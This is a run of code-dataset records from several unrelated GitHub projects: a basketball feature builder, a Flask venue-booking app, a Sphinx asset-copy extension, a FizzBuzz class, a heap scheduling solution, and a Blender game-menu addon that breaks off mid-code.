home_reweighted[\"depth_at_cutoff_H\"] = depth_at_cutoff\n home_reweighted[\"home_win_percentage\"] = self.get_home_win_percentage(\n away_team\n )\n away_reweighted = (\n self.get_regular_season_summary_stats_unadjusted(team_id=away_team)\n .query(\"MIN_mean >= @avg_minutes_played_cutoff\")\n .drop([\"MIN_mean\", \"PLAYER_ID\"], axis=1)\n .add_suffix(\"_A\")\n .rename(columns=lambda x: x.replace(\"_mean\", \"\"))\n )\n depth_at_cutoff = away_reweighted.shape[0]\n away_reweighted = (\n away_reweighted.agg([\"mean\", \"median\", \"max\"]).stack().to_frame().T\n )\n away_reweighted.columns = [\n \"_\".join(map(str, c)) for c in away_reweighted.columns\n ]\n away_reweighted[\"depth_at_cutoff_A\"] = depth_at_cutoff\n away_reweighted[\"road_win_percentage\"] = self.get_away_win_percentage(\n away_team\n )\n adjusted_df = pd.concat([home_reweighted, away_reweighted], axis=1)\n return adjusted_df\n\n def get_features_for_game(\n self, game_id, injury_adjusted: bool, avg_minutes_played_cutoff\n ):\n \"\"\"Return model features for past game.\"\"\"\n game = self.playoff_game_data.query(\"GAME_ID == @game_id\")\n if game.empty:\n raise IndexError(\n \"Game requested is not a valid playoff game for this year.\"\n )\n home_team = game.reset_index(drop=1).TEAM_ID_H[0]\n away_team = game.reset_index(drop=1).TEAM_ID_A[0]\n features = self.feature_creator(\n home_team=home_team,\n away_team=away_team,\n game_id=game_id,\n injury_adjusted=injury_adjusted,\n avg_minutes_played_cutoff=avg_minutes_played_cutoff,\n games_ahead_of_today=0,\n )\n return features\n\n def get_features_for_upcoming(\n self,\n home_team,\n away_team,\n injury_adjusted,\n avg_minutes_played_cutoff,\n games_ahead_of_today,\n ):\n \"\"\"Return model features for upcoming game.\"\"\"\n features = self.feature_creator(\n home_team=home_team,\n away_team=away_team,\n game_id=0,\n injury_adjusted=injury_adjusted,\n avg_minutes_played_cutoff=avg_minutes_played_cutoff,\n games_ahead_of_today=games_ahead_of_today,\n )\n return features\n\n def get_train_for_all_playoff_games(\n self, injury_adjusted: bool, avg_minutes_played_cutoff: int\n ):\n \"\"\"Return dataframe of all adjusted features and game outcomes for this year.\"\"\"\n features = []\n for _, row in self.playoff_game_data.iterrows():\n feature = self.get_features_for_game(\n game_id=row.GAME_ID,\n injury_adjusted=injury_adjusted,\n avg_minutes_played_cutoff=avg_minutes_played_cutoff,\n )\n feature[\"HOME_WIN\"] = row.OUTCOME\n features.append(feature)\n return pd.concat(features)\n","repo_name":"wpowell31/biostats-821-final-project","sub_path":"objects/year.py","file_name":"year.py","file_ext":"py","file_size_in_byte":31782,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"15061001925","text":"#----------------------------------------------------------------------------#\n# Imports\n#----------------------------------------------------------------------------#\n\nimport json\nimport dateutil.parser\nimport babel\nfrom flask import Flask, render_template, request, Response, flash, redirect, url_for\nfrom flask_moment import Moment\nfrom flask_sqlalchemy import SQLAlchemy\nfrom flask_migrate import Migrate\nimport logging\nfrom logging import Formatter, FileHandler\nfrom flask_wtf import Form\nfrom forms import *\nfrom models import Venue, Artist, Show, db , app\nimport collections\ncollections.Callable = collections.abc.Callable\nimport sys\nfrom flask_wtf.csrf import 
CSRFProtect\n#----------------------------------------------------------------------------#\n# App Config.\n#----------------------------------------------------------------------------#\n\n\nmoment = Moment(app)\napp.config.from_object('config')\ndb.init_app(app)\n#csrf = CSRFProtect(app), keep getting errors, still working on it\n#embedded the csrf token in the corresponding html pages as hidden\n\n\n# TODO: connect to a local postgresql database\n\n#----------------------------------------------------------------------------#\n# Models.\n#----------------------------------------------------------------------------#\n \n#----------------------------------------------------------------------------#\n# Filters.\n#----------------------------------------------------------------------------#\n# TypeError: Parser must be a string or character stream, not datetime, to fix this error included the \n# if isinstance(value,str) to use Show.start_time as a parameter in def show()\ndef format_datetime(value, format='medium'):\n if isinstance(value, str):\n date = dateutil.parser.parse(value)\n else:\n date = value \n if format == 'full':\n format=\"EEEE MMMM, d, y 'at' h:mma\"\n elif format == 'medium':\n format=\"EE MM, dd, y h:mma\"\n return babel.dates.format_datetime(date, format, locale='en')\n\napp.jinja_env.filters['datetime'] = format_datetime\n\n#----------------------------------------------------------------------------#\n# Controllers.\n#----------------------------------------------------------------------------#\n\n@app.route('/')\ndef index():\n return render_template('pages/home.html')\n\n\n# Venues\n# ----------------------------------------------------------------\n\n@app.route('/venues')\ndef venues():\n# TODO: replace with real venues data.\n# num_upcoming_shows should be aggregated based on number of upcoming shows per venue.\n data = []\n #first search to get the cities and states\n first_search= Venue.query.distinct(Venue.city,Venue.state).all()#using order_by isnt listing unique values\n now=datetime.now()\n for venue in first_search:\n #data.append({\"city\":venue.city,\"state\":venue.state}),appending to data initially results a display with a quotation, and redundent venues\n ##we get the inital output :New York, NY,San Francisco, CA\n #second search to filter venues according to their state and city\n second_search = Venue.query.filter_by(state=venue.state).filter_by(city=venue.city).all()\n venues = []\n #setting the venues to empty list value out of the for loop results in redundent venues output\n for value in second_search:\n #fetching upcoming shows by comparing to current time \n num_upcoming_shows=len(Show.query.filter(Show.start_time >now).all()) \n venues.append({\n \"id\": value.id,\n \"name\": value.name, \n \"num_upcoming_shows\":num_upcoming_shows})\n data.append({\"city\": venue.city,\"state\": venue.state, \"venues\": venues })\n \n return render_template('pages/venues.html', areas=data)\n\n@app.route('/venues/search', methods=['POST'])\ndef search_venues():\n # same function used in search_artist,had to included the search_term definition in the funtion inorder to work \n # from the search_venues.html we could utilize the 'count' to display the number of items found \n search_term=request.form.get('search_term', '')\n result=Venue.query.filter(Venue.name.ilike(f'%{search_term}%')).all()\n response={'data':result,'count':len(result)}\n return render_template('pages/search_venues.html', results=response, search_term=request.form.get('search_term', 
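# --- Editor's note: illustrative sketch, not one of the dataset records. ---
# venues() above builds a [{city, state, venues: [...]}] structure with one
# extra query per (city, state) pair. The same shape from plain tuples,
# which makes the grouping easier to see than the ORM version:
from collections import defaultdict

rows = [("New York", "NY", 1, "The Dive"),
        ("New York", "NY", 2, "Blue Note"),
        ("San Francisco", "CA", 3, "The Chapel")]
by_area = defaultdict(list)
for city, state, venue_id, name in rows:
    by_area[(city, state)].append({"id": venue_id, "name": name})
data = [{"city": c, "state": s, "venues": v} for (c, s), v in by_area.items()]
print(data)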
''))\n\n@app.route('/venues/<venue_id>')\ndef show_venue(venue_id):\n   venue= Venue.query.get(venue_id)\n   now=datetime.now()\n   upcoming_show_query=db.session.query(Show).join(Artist).filter(Show.venue_id==venue_id).filter(Show.start_time>now).all()\n   past_show_query=db.session.query(Show).join(Artist).filter(Show.venue_id==venue_id).filter(Show.start_time<now).all()\n   venue.upcoming_shows=[{'artist_id': show.artist_id, 'artist_name': show.artist.name, 'artist_image_link': show.artist.image_link, 'start_time': show.start_time} for show in upcoming_show_query]\n   venue.past_shows=[{'artist_id': show.artist_id, 'artist_name': show.artist.name, 'artist_image_link': show.artist.image_link, 'start_time': show.start_time} for show in past_show_query]\n   venue.upcoming_shows_count=len(venue.upcoming_shows)\n   venue.past_shows_count=len(venue.past_shows)\n   return render_template('pages/show_venue.html', venue=venue)\n\n@app.route('/venues/<venue_id>', methods=['DELETE'])\ndef delete_venue(venue_id):\n  # TODO: Complete this endpoint for taking a venue_id, and using\n  # SQLAlchemy ORM to delete a record. Handle cases where the session commit could fail.\n  try:\n    Venue.query.filter(Venue.id==venue_id).delete()\n    db.session.commit()\n    flash('Selected venue deleted')\n  except:\n    db.session.rollback()\n    flash('An error occurred. cannot delete selected venue' )\n  finally:\n    db.session.close()\n  return render_template('pages/home.html')\n  # BONUS CHALLENGE: Implement a button to delete a Venue on a Venue Page, have it so that\n  # clicking that button delete it from the db then redirect the user to the homepage\n\n# Artists\n# ----------------------------------------------------------------\n@app.route('/artists')\ndef artists():\n  #order_by parameter can be added to display artist values according to their ID or name or any other attribute\n  data=Artist.query.all()\n  return render_template('pages/artists.html', artists=data)\n\n@app.route('/artists/search', methods=['POST'])\ndef search_artists():\n  # same function used in search_venue()\n  # from the search_venues.html we could utilize the 'count' to display the number of items found \n  search_term=request.form.get('search_term', '')\n  result=Artist.query.filter(Artist.name.ilike(f'%{search_term}%')).all()\n  response={'data':result,'count':len(result)}\n  return render_template('pages/search_artists.html', results=response, search_term=request.form.get('search_term', ''))\n\n@app.route('/artists/<artist_id>')\ndef show_artist(artist_id):\n  artist= Artist.query.get(artist_id)\n  now=datetime.now()\n  upcoming_show_query=db.session.query(Show).join(Venue).filter(Show.artist_id==artist_id).filter(Show.start_time>now).all()\n  past_show_query=db.session.query(Show).join(Venue).filter(Show.artist_id==artist_id).filter(Show.start_time<now).all()\n  artist.upcoming_shows=[{'venue_id': show.venue_id, 'venue_name': show.venue.name, 'venue_image_link': show.venue.image_link, 'start_time': show.start_time} for show in upcoming_show_query]\n  artist.past_shows=[{'venue_id': show.venue_id, 'venue_name': show.venue.name, 'venue_image_link': show.venue.image_link, 'start_time': show.start_time} for show in past_show_query]\n  artist.upcoming_shows_count=len(artist.upcoming_shows)\n  artist.past_shows_count=len(artist.past_shows)\n  return render_template('pages/show_artist.html', artist=artist)\n\n@app.route('/artists/<artist_id>/edit', methods=['GET'])\ndef edit_artist(artist_id):\n  ##utilized form.populate_obj(artist), but I noticed that I have to fetch genres separately\n  artist= Artist.query.get_or_404(artist_id)\n  form =ArtistForm(obj=artist)\n  form.genres.data=artist.genres\n  return render_template('forms/edit_artist.html', form=form, artist=artist)\n\n@app.route('/artists/<artist_id>/edit', methods=['POST'])\ndef edit_artist_submission(artist_id): \n  artist= Artist.query.get_or_404(artist_id)\n  form = ArtistForm(meta={'csrf': False})\n  if form.validate_on_submit():\n    try: \n      artist.name = form.name.data\n      artist.genres = form.genres.data\n      artist.city = form.city.data\n      artist.state = form.state.data\n      artist.phone = form.phone.data\n      artist.website_link = form.website_link.data\n      artist.facebook_link = form.facebook_link.data\n      artist.seeking_venue = form.seeking_venue.data\n      artist.seeking_description = form.seeking_description.data\n      artist.image_link = form.image_link.data\n      db.session.commit()\n      flash('Artist' + \" \" + request.form['name'] + ' was successfully updated!')\n    except:\n      flash('An error occurred. 
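# --- Editor's note: illustrative sketch, not one of the dataset records. ---
# Both search endpoints above wrap the term in % wildcards and use ILIKE,
# i.e. case-insensitive substring matching. The equivalent check in plain
# Python, useful for unit-testing the expected behaviour:
def ilike_contains(name, search_term):
    return search_term.lower() in name.lower()

names = ["The Dive", "Blue Note", "the divebar"]
print([n for n in names if ilike_contains(n, "Dive")])  # ['The Dive', 'the divebar']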
Artist' + request.form['name'] + ' could not be edited.')\n      db.session.rollback()\n      print(sys.exc_info())\n    finally:\n      db.session.close() \n  else: \n    for field, message in form.errors.items():\n      flash(field + ' - ' + str(message), 'danger')\n    return render_template('forms/edit_artist.html', form=form, artist=artist) \n  return redirect(url_for('show_artist', artist_id=artist_id))\n\n@app.route('/venues/<venue_id>/edit', methods=['GET'])\ndef edit_venue(venue_id):\n  #utilize form.populate_obj(venue), but I noticed that I have to fetch genres separately\n  venue= Venue.query.get_or_404(venue_id)\n  form=VenueForm(obj=venue)\n  form.genres.data=venue.genres\n  return render_template('forms/edit_venue.html', form=form, venue=venue)\n\n@app.route('/venues/<venue_id>/edit', methods=['POST'])\ndef edit_venue_submission(venue_id):\n  # TODO: take values from the form submitted, and update existing\n  # venue record with ID <venue_id> using the new attributes\n  venue= Venue.query.get_or_404(venue_id)\n  form = VenueForm(meta={'csrf': False})\n  if form.validate_on_submit():\n    venue.name=form.name.data\n    venue.genres=form.genres.data\n    venue.address=form.address.data\n    venue.city=form.city.data\n    venue.state=form.state.data\n    venue.phone=form.phone.data\n    venue.website_link=form.website_link.data\n    venue.facebook_link=form.facebook_link.data\n    venue.seeking_talent=form.seeking_talent.data\n    venue.seeking_description=form.seeking_description.data\n    venue.image_link=form.image_link.data\n    try:\n      db.session.commit()\n      flash('Venue' + \" \" + request.form['name'] + ' was successfully updated!')\n    except:\n      flash('An error occurred. Venue' + request.form['name'] + ' could not be edited.')\n      db.session.rollback()\n      print(sys.exc_info())\n    finally:\n      db.session.close() \n  else:\n    for field, message in form.errors.items():\n      flash(field + ' - ' + str(message), 'danger') \n    return render_template('forms/edit_venue.html', form=form, venue=venue) \n  return redirect(url_for('show_venue', venue_id=venue_id))\n\n# Create Artist\n# ----------------------------------------------------------------\n\n@app.route('/artists/create', methods=['GET'])\ndef create_artist_form():\n  form = ArtistForm()\n  return render_template('forms/new_artist.html', form=form)\n\n@app.route('/artists/create', methods=['POST'])\ndef create_artist_submission():\n  form =ArtistForm(meta={'csrf': False})\n  if form.validate_on_submit():\n    try:\n      new_artist =Artist(\n        name=form.name.data,\n        city=form.city.data,\n        state=form.state.data,\n        phone=form.phone.data,\n        genres=\" \".join(form.genres.data),\n        image_link=form.image_link.data,\n        facebook_link=form.facebook_link.data,\n        seeking_description=form.seeking_description.data,\n        website_link=form.website_link.data,\n        seeking_venue=form.seeking_venue.data)\n      db.session.add(new_artist)\n      db.session.commit()\n      # on successful db insert, flash success\n      flash('Artist' + \" \" + request.form['name'] + ' was successfully added!')\n    except: \n      # TODO: on unsuccessful db insert, flash an error instead.\n      flash('An error occurred. 
Artist ' + request.form['name'] + ' could not be added.')\n db.session.rollback()\n print(sys.exc_info())\n finally:\n db.session.close() \n else:\n for field, message in form.errors.items():\n flash(field + ' - ' + str(message), 'danger')\n return render_template('forms/new_artist.html', form=form) \n return render_template('pages/home.html')\n\n\n# Shows\n# ----------------------------------------------------------------\n\n@app.route('/shows')\ndef shows():\n # displays list of shows at /shows\n # TODO: replace with real venues data.\n shows = Show.query.order_by(Show.start_time).all()\n data = []\n for show in shows:\n data.append({\n \"venue_id\": show.venue_id,\n \"venue_name\": show.venue.name,\n \"artist_id\": show.artist_id,\n \"artist_name\": show.artist.name,\n \"artist_image_link\": show.artist.image_link,\n \"start_time\": show.start_time\n })\n \n return render_template('pages/shows.html', shows=data)\n\n@app.route('/shows/create')\ndef create_shows():\n # renders form. do not touch.\n form = ShowForm()\n return render_template('forms/new_show.html', form=form)\n\n@app.route('/shows/create', methods=['POST'])\ndef create_show_submission():\n # called to create new shows in the db, upon submitting new show listing form\n # TODO: insert form data as a new Show record in the db, instead \n form = ShowForm(meta={'csrf': False})\n if form.validate_on_submit():\n try:\n new_show= Show(\n artist_id = form.artist_id.data,\n venue_id = form.venue_id.data,\n start_time = form.start_time.data\n )\n db.session.add(new_show)\n db.session.commit()\n # on successful db insert, flash success\n flash('Show was successfully listed!')\n except:\n # TODO: on unsuccessful db insert, flash an error instead.\n # included the print(sys.exc_info()), to read errors on the terminal\n db.session.rollback()\n flash('An error occurred. 
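# --- Editor's note: illustrative sketch, not one of the dataset records. ---
# Every write path in this app repeats one session discipline: commit, roll
# back on failure, always close. The skeleton with a stand-in session object
# so the control flow runs on its own:
class FakeSession:
    def commit(self): print("commit")
    def rollback(self): print("rollback")
    def close(self): print("close")

session = FakeSession()
try:
    # session.add(new_row) would go here
    session.commit()
except Exception:
    session.rollback()
finally:
    session.close()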
Show could not be listed.')\n print(sys.exc_info())\n finally:\n db.session.rollback()\n else:\n for field, message in form.errors.items():\n flash(field + ' - ' + str(message), 'danger')\n return render_template('forms/new_show.html', form=form) \n return render_template('pages/home.html')\n\n@app.errorhandler(404)\ndef not_found_error(error):\n return render_template('errors/404.html'), 404\n\n@app.errorhandler(500)\ndef server_error(error):\n return render_template('errors/500.html'), 500\n\n\nif not app.debug:\n file_handler = FileHandler('error.log')\n file_handler.setFormatter(\n Formatter('%(asctime)s %(levelname)s: %(message)s [in %(pathname)s:%(lineno)d]')\n )\n app.logger.setLevel(logging.INFO)\n file_handler.setLevel(logging.INFO)\n app.logger.addHandler(file_handler)\n app.logger.info('errors')\n\n#----------------------------------------------------------------------------#\n# Launch.\n#----------------------------------------------------------------------------#\n# Default port:\nif __name__ == '__main__':\n app.run()\n#db.create_all(), included initially to create the classes Venue and Artist, after that used migration to make changes accordingly\n# Or specify port manually:\n'''\nif __name__ == '__main__':\n port = int(os.environ.get('PORT', 5000))\n app.run(host='0.0.0.0', port=port)\n'''\n","repo_name":"Blein7/Fyyur-udacity-project-Nano-degree","sub_path":"app.py","file_name":"app.py","file_ext":"py","file_size_in_byte":18588,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"33881318037","text":"#!/usr/bin/env python\n# -*- coding: utf-8 -*-\n\"\"\"Include In Output Sphinx Extension\n\nThis extension allows you to include relatively referenced files in the output\ndirectory.\n\nUsage with MyST:\n\n```markdown\n{include-in-output}`v1-maiden-6-9-21.bin`\n\nDear readers, please download the [provided binary file](v1-maiden-6-9-21.bin).\n```\n\nIncluding in jupyter-book:\n```python\n# _config.yml\n\n...\n\nsphinx:\n extra_extensions:\n - include_in_output\n...\n\n```\n\"\"\"\n\nfrom pathlib import Path\nimport shutil\nfrom docutils.nodes import reference\n\n\ndef resolve_asset_path(asset_path: Path, source_path: Path, src_dir: Path, out_dir: Path):\n if not asset_path.is_absolute():\n asset_path = source_path.parent / asset_path\n asset_path_relative = asset_path.relative_to(src_dir)\n else:\n asset_path_relative = str(asset_path).removeprefix('/')\n asset_path_src = src_dir / asset_path_relative\n asset_path_out = out_dir / asset_path_relative\n return (asset_path_src, asset_path_out)\n\n\ndef include_in_output_role(name, rawtext, text, lineno, inliner, options={}, content=[]):\n app = inliner.document.settings.env.app\n asset_path_src, asset_path_out = resolve_asset_path(\n Path(text), Path(inliner.document.attributes[\"source\"]),\n Path(app.srcdir), Path(app.outdir)\n )\n \n print(f\"Copying {asset_path_src} to {asset_path_out}\")\n print(f\"Creating {asset_path_out.parent}\")\n asset_path_out.parent.mkdir(parents=True, exist_ok=True)\n shutil.copy(asset_path_src, asset_path_out)\n inliner.reporter.info(f\"Included {asset_path_src} in output\")\n return [], []\n\n\ndef missing_reference_handler(app, env, node, contnode):\n _asset_path_src, asset_path_out = resolve_asset_path(\n Path(node[\"reftarget\"]), Path(contnode.source),\n Path(app.srcdir), Path(app.outdir)\n )\n \n if not asset_path_out.exists():\n return None\n\n return reference(node.rawsource, \"\", contnode, internal=True, 
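# --- Editor's note: illustrative sketch, not one of the dataset records. ---
# The Sphinx extension in this record resolves a referenced asset to a
# (source, output) path pair before copying it. Its resolution logic can be
# exercised without Sphinx; the paths below are invented for the example.
from pathlib import Path

def resolve(asset, source, src_dir, out_dir):
    if not asset.is_absolute():
        asset = source.parent / asset
        rel = asset.relative_to(src_dir)
    else:
        rel = str(asset).lstrip('/')  # stand-in for removeprefix('/')
    return src_dir / rel, out_dir / rel

src, out = resolve(Path("v1.bin"), Path("/docs/guide/page.md"),
                   Path("/docs"), Path("/build"))
print(src)  # /docs/guide/v1.bin
print(out)  # /build/guide/v1.bin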
refuri=node[\"reftarget\"])\n\n\ndef setup(app):\n app.connect(\"missing-reference\", missing_reference_handler)\n app.add_role(\"include-in-output\", include_in_output_role)\n","repo_name":"ubipo/pathy","sub_path":"pathy_docutils/include_in_output.py","file_name":"include_in_output.py","file_ext":"py","file_size_in_byte":2129,"program_lang":"python","lang":"en","doc_type":"code","stars":2,"dataset":"github-code","pt":"53"} +{"seq_id":"27584571350","text":"# Fizzbuzz in Python.\n#\n# This is the straightforward, traditional version with nested\n# if-statements.\n#\n\nclass FizzBuzz():\n \"\"\"Class doing FizzBuzz.\"\"\"\n\n def do_fizzbuzz(self, m):\n \"\"\"Return m, fizz, buzz or fizzbuzz as appropriate.\"\"\"\n if (m % 15) == 0:\n return 'fizzbuzz'\n elif (m % 3) == 0:\n return 'fizz'\n elif (m % 5) == 0:\n return 'buzz'\n else:\n return '%i' % m\n\n def print_table(self, n):\n \"\"\"Print the FizzBuzz table up to n.\"\"\"\n for i in range(1, n+1):\n print (self.do_fizzbuzz(i))\n\n# Main program section.\nfb = FizzBuzz()\nfb.print_table(100)\n","repo_name":"OmriMeshulam/FizzBuzz-Challenge","sub_path":"Python/FizzBuzz.py","file_name":"FizzBuzz.py","file_ext":"py","file_size_in_byte":667,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"28449616131","text":"import heapq\n\ndef solution(stock, dates, supplies, k):\n ans = 0\n hq = []\n idx = 0\n while stock < k:\n for i in range(idx, len(dates)):\n if stock < dates[i]:\n break\n heapq.heappush(hq, -supplies[i])\n idx += 1\n stock += heapq.heappop(hq)*-1\n ans+=1\n return ans\n","repo_name":"imsoncod/Python-Algorithm","sub_path":"Programmers/라면공장.py","file_name":"라면공장.py","file_ext":"py","file_size_in_byte":342,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"53"} +{"seq_id":"14323845128","text":"###########################################################\r\n#\r\n# This addon made by Shihab.\r\n#\r\n# This addon completly free.\r\n# \r\n###########################################################\r\nbl_info = {\r\n \"name\" : \"Add Menu\", \r\n \"category\" : \"Game Engine\", \r\n \"author\" : \"Shihab\", \r\n \"blender\" : (2,79,0), \r\n \"location\" : \"View3D > UI toolbar (n)\", \r\n \"description\": \"Adds Menu\", \"version\":(2,2), \r\n \"wiki_url\" : \"https://blenderartists.org/t/addon-add-menu/1255135\",\r\n \"tracker_url\" : \"https://blenderartists.org/t/addon-add-menu/1255135\"\r\n}\r\n\r\nimport bpy\r\nimport math\r\nimport mathutils\r\n\r\ndef AddMenu():\r\n scene = bpy.context.scene\r\n \r\n #camera menu\r\n bpy.ops.object.camera_add()\r\n caM = bpy.context.object\r\n caM.name = 'cameraMenu'\r\n caM.location = ((3, 4, 13))\r\n caM.rotation_euler = (0, 0, 7.84)\r\n caM.data.lens = (20)\r\n bpy.context.scene.camera = caM\r\n \r\n #add play and settings\r\n bpy.ops.mesh.primitive_plane_add()\r\n play = bpy.context.object\r\n play.name = 'playButton'\r\n play.game.physics_type = 'STATIC'\r\n play.scale = ((1.2, 3.2, 1))\r\n play.location = ((0, 4, 0.3))\r\n mat = bpy.data.materials.new(name=\"MAT\")\r\n mat.diffuse_color = (0.288, 0.5, 0.1)\r\n bpy.ops.object.material_slot_add()\r\n play.data.materials[0] = mat\r\n mat.use_shadeless = True\r\n\r\n #text play\r\n bpy.ops.object.text_add()\r\n Text = bpy.context.object\r\n Text.name = 'textPlay'\r\n Text.game.physics_type = 'NO_COLLISION'\r\n Text.scale = ((2, 2, 1))\r\n Text.location = ((0.6, 1.5, 0.4))\r\n Text.rotation_euler = (0, 0, 7.84)\r\n Text.data.body = 'PLAY'\r\n \r\n 
#add developer and settings\r\n bpy.ops.mesh.primitive_plane_add()\r\n developer = bpy.context.object\r\n developer.name = 'developerButton'\r\n developer.game.physics_type = 'STATIC'\r\n developer.scale = ((1.2, 6.2, 1))\r\n developer.location = ((3, 4, 0.3))\r\n bpy.ops.object.material_slot_add()\r\n developer.data.materials[0] = mat\r\n \r\n #text develpoer\r\n bpy.ops.object.text_add()\r\n Text3 = bpy.context.object\r\n Text3.name = 'textDeveloper'\r\n Text3.game.physics_type = 'NO_COLLISION'\r\n Text3.scale = ((2, 2, 1))\r\n Text3.location = ((3.6, -1.9, 0.4))\r\n Text3.rotation_euler = (0, 0, 7.84)\r\n Text3.data.body = 'DEVELOPER'\r\n print('GG')\r\n \r\n #add quit and settings\r\n bpy.ops.mesh.primitive_plane_add()\r\n Quit = bpy.context.object\r\n Quit.name = 'quitButton'\r\n Quit.game.physics_type = 'STATIC'\r\n Quit.scale = ((1.2, 3.2, 1))\r\n Quit.location = ((6, 4, 0.3))\r\n bpy.ops.object.material_slot_add()\r\n Quit.data.materials[0] = mat\r\n\r\n #text quit\r\n bpy.ops.object.text_add()\r\n Text2 = bpy.context.object\r\n Text2.name = 'textQuit'\r\n Text2.game.physics_type = 'NO_COLLISION'\r\n Text2.scale = ((2, 2, 1))\r\n Text2.location = ((6.6, 1.5, 0.4))\r\n Text2.rotation_euler = (0, 0, 7.84)\r\n Text2.data.body = 'QUIT'\r\n \r\n #camera menu\r\n bpy.ops.object.camera_add()\r\n caM2 = bpy.context.object\r\n caM2.name = 'cameraDeveloper'\r\n caM2.location = ((3, 28, 13))\r\n caM2.rotation_euler = (0, 0, 7.84)\r\n caM2.data.lens = (20)\r\n \r\n #plane developer\r\n bpy.ops.mesh.primitive_plane_add()\r\n imgv = bpy.context.object\r\n imgv.name = 'developerImage'\r\n imgv.game.physics_type = \"NO_COLLISION\"\r\n imgv.scale = ((6.3, 10.6, 0))\r\n imgv.location = ((3, 28, 0))\r\n imgv.rotation_euler = (0, 0, 0)\r\n mat2 = bpy.data.materials.new(name=\"MAT Developer\")\r\n bpy.ops.object.material_slot_add()\r\n imgv.data.materials[0] = mat2\r\n mat2.use_shadeless = True\r\n cTx = bpy.data.textures.new(\"Texture Developer INFO\", type = 'IMAGE')\r\n mtx = mat2.texture_slots.add()\r\n mtx.texture = cTx\r\n \r\n #back plane\r\n bpy.ops.mesh.primitive_plane_add()\r\n bak = bpy.context.object\r\n bak.name = \"backButton\"\r\n bak.game.physics_type = \"STATIC\"\r\n bak.scale = ((1.2, 3.2, 1))\r\n bak.location = ((7.5, 21.5, 0.2))\r\n bak.rotation_euler = (0, 0, 0)\r\n mat3 = bpy.data.materials.new(name=\"MAT Back Button\")\r\n mat3.diffuse_color = (0.288, 0.5, 0.1)\r\n bpy.ops.object.material_slot_add()\r\n bak.data.materials[0] = mat3\r\n mat3.use_shadeless = True\r\n \r\n #back text\r\n bpy.ops.object.text_add()\r\n Text4 = bpy.context.object\r\n Text4.name = 'textBack'\r\n Text4.game.physics_type = 'NO_COLLISION'\r\n Text4.scale = ((2, 2, 1))\r\n Text4.location = ((8.1, 18.6, 0.3))\r\n Text4.rotation_euler = (0, 0, 7.84)\r\n Text4.data.body = 'BACK'\r\n \r\n #logic editor for play\r\n bpy.ops.logic.sensor_add(type=\"MOUSE\",name='left',object=play.name)\r\n bpy.ops.logic.controller_add(type=\"LOGIC_AND\",object=play.name)\r\n bpy.ops.logic.actuator_add(type=\"SCENE\",name='playScene',object=play.name)\r\n play.game.actuators['playScene'].mode = 'SET'\r\n bpy.ops.logic.sensor_add(type=\"MOUSE\",name='over',object=play.name)\r\n play.game.sensors['over'].mouse_event = 'MOUSEOVER'\r\n bpy.ops.logic.sensor_add(type=\"ALWAYS\",name='Always',object=play.name)\r\n bpy.ops.logic.controller_add(type=\"LOGIC_AND\",object=play.name)\r\n bpy.ops.logic.actuator_add(type=\"MOUSE\",name='Mouse Show',object=play.name)\r\n play.game.sensors['Always'].use_tap = True\r\n 
play.game.sensors['left'].use_tap = True\r\n\r\n    #logic editor for quit\r\n    bpy.ops.logic.sensor_add(type=\"MOUSE\",name='left',object=Quit.name)\r\n    bpy.ops.logic.controller_add(type=\"LOGIC_AND\",object=Quit.name)\r\n    bpy.ops.logic.actuator_add(type=\"GAME\",name='Quit Game',object=Quit.name)\r\n    Quit.game.actuators['Quit Game'].mode = 'QUIT'\r\n    bpy.ops.logic.sensor_add(type=\"MOUSE\",name='over',object=Quit.name)\r\n    Quit.game.sensors['over'].mouse_event = 'MOUSEOVER'\r\n    Quit.game.sensors['left'].use_tap = True\r\n    \r\n    #logic editor for developer\r\n    bpy.ops.logic.sensor_add(type=\"MOUSE\",name='left',object=developer.name)\r\n    bpy.ops.logic.sensor_add(type=\"MOUSE\",name='over',object=developer.name)\r\n    developer.game.sensors['over'].mouse_event = 'MOUSEOVER'\r\n    developer.game.sensors['left'].use_tap = True\r\n    bpy.ops.logic.controller_add(type=\"LOGIC_AND\",object=developer.name)\r\n    bpy.ops.logic.actuator_add(type=\"SCENE\",name='Go_Camera',object=developer.name)\r\n    developer.game.actuators['Go_Camera'].mode = 'CAMERA'\r\n    developer.game.actuators['Go_Camera'].camera = bpy.data.objects[\"cameraDeveloper\"]\r\n    \r\n    #logic editor for back_button\r\n    bpy.ops.logic.sensor_add(type=\"MOUSE\",name='Left',object=bak.name)\r\n    bpy.ops.logic.sensor_add(type=\"MOUSE\",name='over',object=bak.name)\r\n    bak.game.sensors['over'].mouse_event = 'MOUSEOVER'\r\n    bak.game.sensors['Left'].use_tap = True\r\n    bpy.ops.logic.controller_add(type=\"LOGIC_AND\",object=bak.name)\r\n    bpy.ops.logic.actuator_add(type=\"SCENE\",name='Select Camera Menu',object=bak.name)\r\n    bak.game.actuators['Select Camera Menu'].mode = 'CAMERA'\r\n    bak.game.actuators['Select Camera Menu'].camera = bpy.data.objects[\"cameraMenu\"]\r\n    \r\n    #link controllers play\r\n    play.game.sensors['left'].link(play.game.controllers[-1])\r\n    play.game.actuators[\"playScene\"].link(play.game.controllers[-1])\r\n    play.game.sensors['over'].link(play.game.controllers[-1])\r\n    play.game.actuators[\"Mouse Show\"].link(play.game.controllers[0])\r\n    play.game.sensors['Always'].link(play.game.controllers[0])\r\n    #link controllers Quit\r\n    Quit.game.sensors['left'].link(Quit.game.controllers[-1])\r\n    Quit.game.actuators[\"Quit Game\"].link(Quit.game.controllers[-1])\r\n    Quit.game.sensors['over'].link(Quit.game.controllers[-1])\r\n    #link controllers developer\r\n    developer.game.sensors['left'].link(developer.game.controllers[-1])\r\n    developer.game.sensors['over'].link(developer.game.controllers[-1])\r\n    developer.game.actuators[\"Go_Camera\"].link(developer.game.controllers[-1])\r\n    #link controllers bak_button\r\n    bak.game.sensors['Left'].link(bak.game.controllers[-1])\r\n    bak.game.sensors['over'].link(bak.game.controllers[-1])\r\n    bak.game.actuators[\"Select Camera Menu\"].link(bak.game.controllers[-1])\r\n    \r\nclass add_menu(bpy.types.Operator):\r\n    bl_idname = \"object.add_menu\"\r\n    bl_description = 'add a menu (set the scene to play it from menu)'\r\n    bl_label = \"Add Menu\"\r\n    bl_options = {\"REGISTER\",\"UNDO\"}\r\n    \r\n    def execute(self, context):\r\n        